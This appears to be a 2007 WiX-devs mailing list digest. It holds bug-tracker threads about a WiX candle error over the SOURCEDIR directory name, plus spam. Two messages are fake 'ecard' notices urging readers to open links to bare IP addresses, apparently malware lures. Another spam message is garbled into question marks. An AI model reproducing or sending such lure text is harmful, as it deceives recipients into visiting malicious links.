
Ящик для предложений: sales@blogslov.ru
Send WiX-devs mailing list submissions to
wix-devs@lists.sourceforge.net
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.sourceforge.net/lists/listinfo/wix-devs
or, via email, send a message with subject or body 'help' to
wix-devs-request@lists.sourceforge.net
You can reach the person managing the list at
wix-devs-owner@lists.sourceforge.net
When replying, please edit your Subject line so it is more specific
than "Re: Contents of WiX-devs digest..."
Today's Topics:
1. [ wix-Bugs-1562657 ] error CNDL0206 when TARGET Directory
Name is SOURCEDIR (SourceForge.net)
2. [ wix-Bugs-1747119 ] error CNDL0206 when TARGET Directory
Name is SOURCEDIR (SourceForge.net)
3. July 4th Fireworks Show (bluemountain.com)
4. (no subject) (*)
5. (no subject) (*)
6. Your Nations Birthday (VintagePostcards.Com)
7. =?GB2312?B?MDA6Mzg6MTay+iDGtyDI5yC6ziDNqCC5/Q==?= E M
C00:38:16
(=?GB2312?B?K7XnILTFILzmIMjd?= E M C =?GB2312?B?1fsguMQg0+sgttQgst8r?=)
8. mailbody_QFAALXO.pdf (Lopez)
----------------------------------------------------------------------
Message: 1
Date: Tue, 03 Jul 2007 06:18:48 -0700
From: "SourceForge.net"
Subject: [WiX-devs] [ wix-Bugs-1562657 ] error CNDL0206 when TARGET
Directory Name is SOURCEDIR
To: noreply@sourceforge.net
Message-ID:
Content-Type: text/plain; charset="UTF-8"
Bugs item #1562657, was opened at 2006-09-21 09:32
Message generated for change (Comment added) made by igorsol
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=642714&aid=1562657&group_id=105970
Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: candle
Group: None
Status: Closed
Resolution: Invalid
Priority: 5
Private: No
Submitted By: appel (appel__)
Assigned to: Rob Mensching (robmen)
Summary: error CNDL0206 when TARGET Directory Name is SOURCEDIR
Initial Comment:
Using:
Microsoft (R) Windows Installer Xml Compiler version
3.0.2015.0
The Directory element is:
The error:
C:\proj\wixtest\wixtest.wxs(17) : error CNDL0206 :
The 'TARGETDIR' directory has an illegal DefaultDir
value of 'tqepgrb4|SOURCEDIR'. The DefaultDir value
is created from the *Name attributes of the Directory
element. The TARGETDIR directory is a special
directory which must have its Name attribute set
to 'SourceDir' or 'SOURCEDIR'.
If I change SOURCEDIR to SourceDir it works. So either
there's a problem with handling both cases or the
error text is wrong.
----------------------------------------------------------------------
Comment By: igorsol (igorsol)
Date: 2007-07-03 16:18
Message:
Logged In: YES
user_id=1809652
Originator: NO
Error message says:
"The TARGETDIR directory is a special
directory which must have its Name attribute set
to 'SourceDir' or 'SOURCEDIR'"
So error message allows to use SOURCEDIR value. But candle generates
CNDL0206 error. So error message is wrong. (Tested with WiX 3.0.3029.0)
----------------------------------------------------------------------
Comment By: Rob Mensching (robmen)
Date: 2006-12-03 02:15
Message:
Logged In: YES
user_id=991639
Originator: NO
The erorr message is correct, you should use the pair TARGETDIR/SourceDir.
SOURCEDIR is a very old way to refer to SourceDir and is supported by the
Windows Installer only for legacy reasons.
----------------------------------------------------------------------
Comment By: Mike Dimmick (mikedimmick)
Date: 2006-11-06 17:48
Message:
Logged In: YES
user_id=1040952
I'm not sure about the use of SOURCEDIR. That would be a public property,
but you
can't make a public property override a private property with the same
name but
different case - can you? The SDK documentation for the Directory table
only mentions
SourceDir, not SOURCEDIR.
If SOURCEDIR is actually legitimate, the problem here is that the Compiler
class is
generating a shortname for the long name SOURCEDIR and concatenating it;
the whole
then doesn't match the check for SOURCEDIR at line 3874 of Compiler.cs.
The condition
at line 3695 'else if ("SourceDir" == name || ...' should be extended to
include
SOURCEDIR so that this short name is not generated. Line numbers from
3.0.2015.0, but
the problem still exists in 3.0.2301.0 (by source inspection).
Is this the only place where the source part of the directory is expected
to be a
property, or do we need a general way to indicate that a name is a
property and
therefore should not have a short name generated for it?
----------------------------------------------------------------------
Comment By: Hilko_Lantinga (hilko_lantinga)
Date: 2006-09-25 11:53
Message:
Logged In: YES
user_id=1470437
SDK:
SourceDir Property
The SourceDir property is the root directory that contains
the source cabinet file or the source file tree of the
installation package. This value is used for directory
resolution.
So the error text seams to be wrong. Wise uses SOURCEDIR,
but they have been wrong before.
----------------------------------------------------------------------
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=642714&aid=1562657&group_id=105970
------------------------------
Message: 2
Date: Tue, 03 Jul 2007 06:25:11 -0700
From: "SourceForge.net"
Subject: [WiX-devs] [ wix-Bugs-1747119 ] error CNDL0206 when TARGET
Directory Name is SOURCEDIR
To: noreply@sourceforge.net
Message-ID:
Content-Type: text/plain; charset="UTF-8"
Bugs item #1747119, was opened at 2007-07-03 16:25
Message generated for change (Tracker Item Submitted) made by Item Submitter
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=642714&aid=1747119&group_id=105970
Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: candle
Group: v3.0
Status: Open
Resolution: None
Priority: 5
Private: No
Submitted By: igorsol (igorsol)
Assigned to: Nobody/Anonymous (nobody)
Summary: error CNDL0206 when TARGET Directory Name is SOURCEDIR
Initial Comment:
Using:
Microsoft (R) Windows Installer Xml Compiler version
3.0.3029.0
The Directory element is:
Error message allows us to use 'SourceDir' or 'SOURCEDIR':
error CNDL0206 :
The 'TARGETDIR' directory has an illegal DefaultDir
value of 'tqepgrb4|SOURCEDIR'. The DefaultDir value
is created from the *Name attributes of the Directory
element. The TARGETDIR directory is a special
directory which must have its Name attribute set
to 'SourceDir' or 'SOURCEDIR'.
If I change SOURCEDIR to SourceDir it works. So either
there's a problem with handling both cases or the
error text is wrong.
----------------------------------------------------------------------
You can respond by visiting:
https://sourceforge.net/tracker/?func=detail&atid=642714&aid=1747119&group_id=105970
------------------------------
Message: 3
Date: Wed, 4 Jul 2007 08:36:33 +0200
From: "bluemountain.com"
Subject: [WiX-devs] July 4th Fireworks Show
To:
Message-ID:
Content-Type: text/plain; format=flowed; charset="Windows-1252";
reply-type=original
Hi. Mate has sent you an ecard.
See your card as often as you wish during the next 15 days.
SEEING YOUR CARD
If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:
http://69.218.254.94/?c50080d0229e368412571d7d41
Or copy and paste it into your browser's "Location" box (where Internet
addresses go).
PRIVACY
bluemountain.com honors your privacy. Our home page and Card Pick Up have links to our
Privacy Policy.
TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card,
please disregard this Announcement.
We hope you enjoy your awesome card.
Wishing you the best,
Administrator,
bluemountain.com
------------------------------
Message: 4
Date: Wed, 4 Jul 2007 21:47:48 +0800
From: "*"
Subject: [WiX-devs] (no subject)
To: wix-devs@lists.sourceforge.net
Message-ID:
Content-Type: text/plain; charset="us-ascii"
An HTML attachment was scrubbed...
------------------------------
Message: 5
Date: Wed, 4 Jul 2007 22:11:12 +0800
From: "*"
Subject: [WiX-devs] (no subject)
To: wix-devs@lists.sourceforge.net
Message-ID:
Content-Type: text/plain; charset="us-ascii"
An HTML attachment was scrubbed...
------------------------------
Message: 6
Date: Wed, 4 Jul 2007 09:14:50 -0700
From: "VintagePostcards.Com"
Subject: [WiX-devs] Your Nations Birthday
To:
Message-ID:
Content-Type: text/plain; format=flowed; charset="Windows-1252";
reply-type=original
Hi. Partner has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.
SEEING YOUR CARD
If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:
http://89.228.27.216/?804814655dc21c83715e8517a32e6b9ea6878
Or copy and paste it into your browser's "Location" box (where Internet
addresses go).
PRIVACY
VintagePostcards.Com honors your privacy. Our home page and Card Pick Up have links to our
Privacy Policy.
TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card,
please disregard this Announcement.
We hope you enjoy your awesome card.
Wishing you the best,
Mailer-Daemon,
VintagePostcards.Com
------------------------------
Message: 7
Date: Thu, 12 Jul 2007 00:38:23 +0800
From: =?GB2312?B?K7XnILTFILzmIMjd?= E M C
=?GB2312?B?1fsguMQg0+sgttQgst8r?=
Subject: [WiX-devs] =?GB2312?B?MDA6Mzg6MTay+iDGtyDI5yC6ziDNqCC5/Q==?=
E M C00:38:16
To: "wix-devs"
Message-ID:
Content-Type: text/plain; charset="gb2312"
wix-devs?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ????
?? ?? ?? ?? ?? E M C ?? ?? ?? ?? ?? ?? ???? ?? ?? ????
-----------------------------------------------------------------------------------
???????????? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ??( 0 7 5 5 ) 8 2 9 7 0 2 2 4 ?? 8 2 9 7 4 7 0 9 ?? ?? ??
?? ?? ?? ?? ??( 0 7 5 5 ) 8 2 9 7 4 7 0 9
??????????2 0 0 7 ?? 0 7 ?? 0 7 - - 0 8 ?? ?? ?????? ?? ?? ?? ?? ?? ?? ??
2 0 0 7 ?? 0 8 ?? 0 4 - - 0 5 ?? ?? ?????? ?? ?? ?? ?? ??
??????????2 2 0 0 ?? ?? ???? ?? ?? ?????? ?? ?????? ?? ?????? ????
?? ?? ?? ?????? ?? ?? ?????? ?????? ?? ?? ?? ?? ?? ?? ?????? ?????? ?? ?? ?? ?? ????
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-------------------------------------------------------------------------------------
???? ?? ?? ??????
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ??. ?? ?????? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? . ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? . ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? , ?? ?? ?? ??
?? ??,?? ?? ?? ?? ?? ??.
?? ?? ?? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? .?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??,??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ????,?? ?? ?? ?? ?? ?????? ????,?? ?? ?? ??
?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ??.?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ??
??,?? ?? ?? ?? .?? ?? ?? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ??
??,?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??.?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??.?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??,?? ??
?? ?? ?? ?? ?? ?? , ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ??,?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??.
116670
-------------------------------------------------------------------------------------
???? ?? ?? ??????
?? ?? ?? ?? ?? ?? EMC ?? ?? ?? ?? ?? ,?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ??
?? ?? ?????? ?????? ????PCB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EMC ?? ?? ?? ??.
-------------------------------------------------------------------------------------
???? ?? ?? ????
Daniel ???? ?? ????
?? ?? ?? ?? ?? ?? ?????? EMC ?? ?????? ?? ?? ?????? ?? ?? ?????? ?? ?? ?????? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E M C ?? ?? ?? ?????? ?? ?? ?? ??
EMC ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?????? ?? ??
?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? EMC ?? ?? ?? ?? ????
?? ????E M C ?? ?? ?? EMC ?? ?? ?? ??
E M C ?? ?????? ?? ?? ?? ?? ?? ??
?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EMC ?? ?? ?? ?? ?? ?????? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EMC ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ??
3000 ?? ?? ????
?? ???? ASQ ?? ?? ?? ??
IEEE ?? ?? ?? ??
?? ?? ?? ????IBM?? ?? ?? ?????? ?? ?? ?? ??UT ?? ?? ?? ??TCL , ?? ?? ???? ?? ?? ???? ?? ?? ????
?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ????
?? ?? ?? ?? ?????? ?? ?? ?? ?? ?????? ?? ?? ????Robotoolz??T T T ?? ?? ?? ?????? ??
?? ?? ?? ?????? ?? ?????? ?? ?? ?????? ?? ABB ?? ?????? ?? ?? ?? ?? ?? ?? ?? ????
?? ?? ?? ?????? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ?? ???? ?????? ?? ?? ???? ?? ?? ????
?????? ?? ?? ?????? ?? ?? ?????? ?? (?? ??)?? ?? ?? ?????? ?? ?? ?? ?? ??(?? ??)??
?? ?? ??????
-------------------------------------------------------------------------------------
???? ?? ?? ????
?????? ?? ?? ?? ?? ?? ?? ??
1???? ?? ?? ?? ?? ?? ?? ??
2???? ?? ?? ?? ?X ??
3???? ?? ?? ?? ?? ??
4???? ?? ?? ?? ?? ?? ??
5???? ?? ?? ?? ?? ?? ??
?????? ?? ?? ?? ?? ?? ?? ??
1??EMI ?? ?? ?? ?? ?? ?? ?? ?? ??.
2??EMS ?? ?? ?? ?? ?? ?? ?? ?? ??
???? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
3??EMC ?? ?? ?? ?? ?? ??
???? ?? ?? ?? ?? ??
???? ?? ??
???? ?? ?? ?? ?? ??
?????? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
1???? ?? ?? ?? ?? ??,?? ?? ?? ??
2??E M C ?? ?? ?? ?? ?? ??
3??E M C ?? ?? ?? ?? ?? ????
4???? ??1 DVD Player?? ?? ?? ??
5??????2 ????????????????????
?????? ?? ?? ?? ?? ??,?? ?? ?? ??
1???? ?? ?? ?? ?? ??
?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ??
?? ????????????
?? ?? ?? ?? ??
?????? ?? ?? ?? ?? ??
1???? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ??, ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ??
2???? ?? ?? ?? ?? ?X
?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ??
?? ?? ??, ?? ?? ?? ?? ?? ??
3??PCB ?? ?? ?? ?? ?? ?? ??
?? ?? ?? ?? ?? ??
?? ?? ?? ?? ??
?? ?? ?? ?? ??
?? ?? ?? ?? ??
?? ?? ?? ?? ??
?? ?? ?? ?? ?? ?? ?? ??
4??PCB ?? ?? ?? ?? ?? ?? ??
????E M C ?? ?? ?? ?? ??
1???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?? ?? ?? LCD Monitor?? ??
2???? ?? ?? ?? ?? EMC ?? ?? ?? ?? ?? ??
3???? ?? ?? ?? ?? EMC ?? ?? ?? ?? ?? ??
4??EMI ?? ?? ?? ?? ?? ?? ?? ??
5???? ?? ?? ?? ?? ?? ?? ?? ?? ??.
6???? ???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
?????? ?? ?? ?? ?? ?? ??
1???? ?? ?? ?? ?? ?? (EFTB) ?? ?? ??
2???? ?? ?? ?? ?? ?? EFTB ?? ?? ?? ?? ??
3??EFTB ?? ?? ?? ?? ?????? ???? ?? ?? ?? ?? EFTB ?? ?? ?? ?? ?? ?? ??
4???? ??( Surge )?? ?? ??
5???? ?? ?? ?? ?? ?? ?? ??
6???? ?? ?? ?? ?? ?? ?????? ???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
7???? ?? ?? ?? (ESD) ?? ?? ??.
8???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
9???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
10???? ?????? ?? ?? ?? ?? ?? ?? ?? ?? ??
===============================================================================
---TO----wix-devs
{ ?? ?? ?? ?? }
?? ?? ?? ?? ?? ?? ?? ?? ????< 0 7 5 5?? 8 2 9 7 4 7 0 9 >
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ????
??-??-??-?????????????????????? ??1????-?? ??2????-?? ??3????-??
??-??-??-??-??-??-??-?????????????????????? ???? ?? ?? ?? ??
#??-??-??-??-??-????__________________________________ ??-??-??-??:_________??
#??-??-??-???? ?? ?? ?? ?? ?? E M C ?? ?? ?? ?? ?? ??
#??-??-????__________??-??:_______________??-??:________________??-????____________
#??-??-??-?? ????______________??
#?? ?? ????_________??-??-??-????__________??-??-??-????_________ ??-????__________
#?? ?? ????_________??-??-??-????__________??-??-??-????__________??-????__________
#?? ?? ????_________??-??-??-????__________??-??-??-????__________??-????__________
#?? ?? ????_________??-??-??-????__________??-??-??-????__________??-????__________
??????????
1???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?????? ?? ?? ?? ?? ?? ?? ??,?? ?? ?? ?? ?? ?? ?? ??!
2???? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ????
===============================================================================
00:38:16
------------------------------
Message: 8
Date: Wed, 4 Jul 2007 14:03:24 -0400
From: Lopez
Subject: [WiX-devs] mailbody_QFAALXO.pdf
To: wix-devs@lists.sourceforge.net
Message-ID:
Content-Type: text/plain; charset="windows-1252"
-------------- next part --------------
A non-text attachment was scrubbed...
Name: mailbody_QFAALXO.pdf
Type: application/pdf
Size: 19005 bytes
Desc: not available
------------------------------
-------------------------------------------------------------------------
This SF.net email is sponsored by DB2 Express
Download DB2 Express C - the FREE version of DB2 express and take
control of your XML. No limits. Just data. Click to get it now.
http://sourceforge.net/powerbar/db2/
------------------------------
_______________________________________________
WiX-devs mailing list
WiX-devs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/wix-devs
End of WiX-devs Digest, Vol 14, Issue 8
***************************************
P.S. И не забудьте послать роботу вашу рекламу :)
Обработано объявлений: 11768
Стас Давыдов & Outcorp © 2007